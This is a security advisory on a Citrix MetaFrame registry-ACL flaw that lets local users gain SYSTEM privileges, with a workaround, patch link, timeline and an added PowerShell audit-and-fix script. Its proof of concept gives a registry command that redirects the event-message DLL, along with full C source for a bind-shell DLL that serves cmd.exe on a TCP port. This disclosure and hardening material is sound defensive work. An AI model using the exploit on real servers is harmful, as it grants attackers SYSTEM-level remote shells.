#SIAADV-06-003 - CITRIX METAFRAME XP - permissive ACLs allow privilege escalation
--------------------------------------------------------------------------------

Author:   Andres Tarasco Acuña ( atarasco @ sia.es )
Vendor:   Citrix - http://www.citrix.com
Impact:   Local privilege escalation
Advisory: http://www.514.es

Affected application
--------------------
- Citrix Metaframe 1.8
- Citrix Metaframe Presentation Server 3.0
- Citrix Presentation Server 4.0

Affected versions
-----------------
- Metaframe XP Servers <= v1.0 Feature Release
- Metaframe XP updated from old releases

Technical Details:
------------------
While performing security tests against several Citrix Metaframe servers, a
potential security issue was found, caused by permissive ACLs.

By default, the access rights on the registry key

  HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\MetaframeEvents

grant write access to Authenticated Users. Under that key there are two values,
CategoryMessageFile and EventMessageFile, that point to the Citrix event message
library, stored by default at %SystemRoot%\System32\MFEvent.dll. This library is
loaded by the Event Log service.

Because the key is writable, an authenticated user can change the library path
in the registry so that it points to a specially crafted library; when that
library is loaded, it executes arbitrary code with SYSTEM privileges. This flaw
therefore allows any authenticated user to elevate privileges on a Metaframe
server.

Workaround:
-----------
Use regedt32.exe to restrict the permissions on the key below, granting
read-only access to every account that is not an administrator.
Hive: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\MetaframeEvents

Patch:
------
Citrix has released a security bulletin that addresses this vulnerability:
http://support.citrix.com/article/CTX110492
Related patches can also be downloaded from http://support.citrix.com/hotfixes.jsp

Proof of concept:
-----------------
Compile the following library (as poc.dll) and change the EventMessageFile
registry value (/f overwrites the existing value without prompting):

c:\>reg ADD HKLM\system\Currentcontrolset\Services\Eventlog\Application\MetaframeEvents /v EventMessageFile /t REG_EXPAND_SZ /d c:\winnt\tasks\poc.dll /f

/* Bindshell library for testing Citrix Metaframe code execution */
#include <winsock2.h>   /* must be included before windows.h */
#include <windows.h>
#pragma comment (lib,"ws2_32")

#define SIATIGERTEAM 51477   /* TCP port the shell listens on */

DWORD WINAPI BindShell(LPVOID foo)
{
    /* Bind shell on port 51477: every accepted connection gets a cmd.exe whose
       standard handles are the (inheritable) client socket. */
    SOCKET s, s2;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    WSADATA HWSAdata;
    struct sockaddr_in sa;
    int len;
    char cmd[] = "cmd.exe";

    if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { return (DWORD)-1; }
    /* WSASocket without WSA_FLAG_OVERLAPPED yields a socket that works as a std handle */
    if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0)) == INVALID_SOCKET) { return (DWORD)-1; }

    sa.sin_family = AF_INET;
    sa.sin_port = htons(SIATIGERTEAM);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    len = sizeof(sa);
    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) == SOCKET_ERROR) { return (DWORD)-1; }
    if (listen(s, 1) == SOCKET_ERROR) { return (DWORD)-1; }

    while (1) {
        s2 = accept(s, (struct sockaddr *)&sa, &len);
        if (s2 == INVALID_SOCKET) { continue; }
        ZeroMemory(&si, sizeof(si));
        ZeroMemory(&pi, sizeof(pi));
        si.cb = sizeof(si);
        si.wShowWindow = SW_HIDE;
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        si.hStdInput  = (HANDLE)s2;   /* SOCKET used as stdin/stdout/stderr */
        si.hStdOutput = (HANDLE)s2;
        si.hStdError  = (HANDLE)s2;
        /* bInheritHandles = TRUE so cmd.exe receives the socket handle */
        if (!CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) { return (DWORD)-1; }
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        closesocket(s2);
    }
    return 0; /* not reached */
}

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    DWORD i;
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        /* Start the listener on its own thread so the loading process is not blocked */
        CreateThread(NULL, 0, BindShell, NULL, 0, &i);
        break;
    case DLL_PROCESS_DETACH:
    default:
        return FALSE;
    }
    return TRUE;
}

Timeline:
---------
June 9, 2006  - Vulnerability discovered
June 11, 2006 - Vendor notified
June 12, 2006 - First vendor response
July 18, 2006 - Fix released by Citrix
July 18, 2006 - Public disclosure
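The workaround above has the administrator tighten the ACL by hand in regedt32.exe. The script below is an added example, not part of the SIA advisory and not Citrix code, that audits the same key from PowerShell: it lists every Allow ACE granting a non-administrative principal a write right on MetaframeEvents, checks that EventMessageFile and CategoryMessageFile still resolve to %SystemRoot%\System32\MFEvent.dll (a redirected value is evidence the key has already been abused), and with -Fix rewrites the offending ACEs to read-only as the advisory recommends. It assumes the key exists (a MetaFrame/Presentation Server host), that PowerShell is available and the session is elevated for -Fix (the Windows 2000/2003 hosts of the advisory's era would need regedt32.exe instead), and the set of principals treated as trusted is an assumption of this example.

```powershell
# Added audit/hardening example for SIAADV-06-003; not part of the advisory or of Citrix code.
# Assumes: the MetaframeEvents key exists, and -Fix runs from an elevated session.
param([switch]$Fix)

$KeyPath  = 'HKLM:\SYSTEM\CurrentControlSet\Services\Eventlog\Application\MetaframeEvents'
$GoodPath = Join-Path $env:SystemRoot 'System32\MFEvent.dll'   # default location per the advisory

# Principals that legitimately keep write access (assumed trusted set for this example).
$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER', 'NT SERVICE\TrustedInstaller')

# Any of these rights lets a caller redirect EventMessageFile or grant itself more rights.
$R = [System.Security.AccessControl.RegistryRights]
$WriteMask = $R::SetValue -bor $R::CreateSubKey -bor $R::Delete -bor $R::ChangePermissions -bor $R::TakeOwnership

$Acl = Get-Acl -Path $KeyPath
$Bad = @($Acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $Trusted -notcontains $_.IdentityReference.Value -and
    ([int]$_.RegistryRights -band [int]$WriteMask) -ne 0
})

foreach ($ace in $Bad) {
    $src = if ($ace.IsInherited) { 'inherited' } else { 'explicit' }
    Write-Output ("WRITE ACCESS: {0} has {1} ({2})" -f $ace.IdentityReference, $ace.RegistryRights, $src)
}

# Also verify the two message-file values have not been redirected to another DLL.
$Key = Get-Item -Path $KeyPath
foreach ($name in 'EventMessageFile', 'CategoryMessageFile') {
    $raw = $Key.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
    $resolved = [Environment]::ExpandEnvironmentVariables([string]$raw)
    if ($resolved -ine $GoodPath) {
        Write-Output ("TAMPERED?: {0} = '{1}' (expected {2})" -f $name, $raw, $GoodPath)
    }
}

if ($Fix -and $Bad.Count -gt 0) {
    # Inherited ACEs cannot be edited in place: break inheritance, keeping copies as explicit ACEs.
    if ($Bad | Where-Object IsInherited) { $Acl.SetAccessRuleProtection($true, $true) }
    foreach ($ace in $Bad) {
        $Acl.RemoveAccessRuleSpecific($ace)
        # Same principal and inheritance flags, but read-only, as the advisory's workaround prescribes.
        $ro = New-Object System.Security.AccessControl.RegistryAccessRule(
            $ace.IdentityReference, 'ReadKey', $ace.InheritanceFlags, $ace.PropagationFlags, 'Allow')
        $Acl.AddAccessRule($ro)
    }
    Set-Acl -Path $KeyPath -AclObject $Acl
    Write-Output "ACL tightened; SYSTEM and Administrators keep full control."
}
elseif ($Bad.Count -eq 0) {
    Write-Output "OK: no non-administrative principal has write access to MetaframeEvents."
}
```

Run it once without arguments to see the findings, then with -Fix from an elevated prompt. Downgrading everyone except SYSTEM and Administrators to ReadKey does not interfere with logging, since the Event Log service runs as SYSTEM; the value check is worth running even on patched hosts, because a path that no longer points at MFEvent.dll means the key was changed before the fix was applied.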